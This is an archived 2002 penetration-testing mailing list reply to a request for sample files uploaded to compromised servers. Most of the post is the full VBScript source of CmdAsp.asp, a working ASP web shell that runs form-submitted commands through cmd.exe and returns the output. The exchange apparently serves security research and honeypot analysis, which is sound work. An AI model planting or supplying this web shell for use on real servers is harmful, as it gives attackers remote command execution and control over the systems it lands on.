Penetration Testing mailing list archives

Re: ASP Files

From: Javier Fernández-Sanguino Peña <jfernandez () germinus com>
Date: Tue, 10 Dec 2002 19:14:49 +0100

Ian Lyte wrote:

Hi All,

   I'm looking for some sample .asp / .php files (preferably some captured
from honeypots if at all possible) that are currently being uploaded on
compromised systems.

Well, this one was not captured from a honeypot, it's based on onepublished over there (in this same list and many other places) with someminor changes by me. I guess the original one is

http://www.securiteam.com/tools/CmdAsp_asp_checks_your_last_line_of_defense.html

Regards

Javi

PS: Try google to find more references to this one.

<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
'  File:    CmdAsp.asp
'  Author:  Maceo <maceo @ dogmile.com>
'  Release: 2000-12-01
'  OS:      Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet=Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & ">" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<%= "Ejecución de comando: " & szCMD %>
<%= "Fichero creado: " & szTempFile %>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" sizeE value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
'Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

ASP Files Ian Lyte (Dec 10)
- Re: ASP Files Javier Fernández-Sanguino Peña (Dec 10)
- Re: ASP Files H D Moore (Dec 10)
- <Possible follow-ups>
- RE: ASP Files Ben Meghreblian (Dec 10)